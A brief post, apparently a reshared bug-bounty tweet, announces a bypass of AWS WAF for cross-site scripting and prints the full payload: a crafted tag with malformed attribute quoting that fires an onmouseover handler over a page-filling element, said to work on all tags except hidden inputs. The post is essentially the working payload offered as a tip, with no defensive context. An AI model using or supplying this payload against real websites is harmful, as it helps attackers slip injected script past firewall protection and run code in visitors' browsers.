An exclusive AWS WAF bypass has been discovered that affects XSS vulnerabilities. The bypass payload <xhzeem attr="x="=='='onmouseover=confirm`xhzeem` style="display:block;width:1000px;height:1000px;background:red">" works on all tags except for input:hidden. This bypass allows executing malicious code on the target website. #infosec #cybersec #bugbountytips
Check out the original tweet here: https://twitter.com/0x0SojalSec/status/1886146499014533511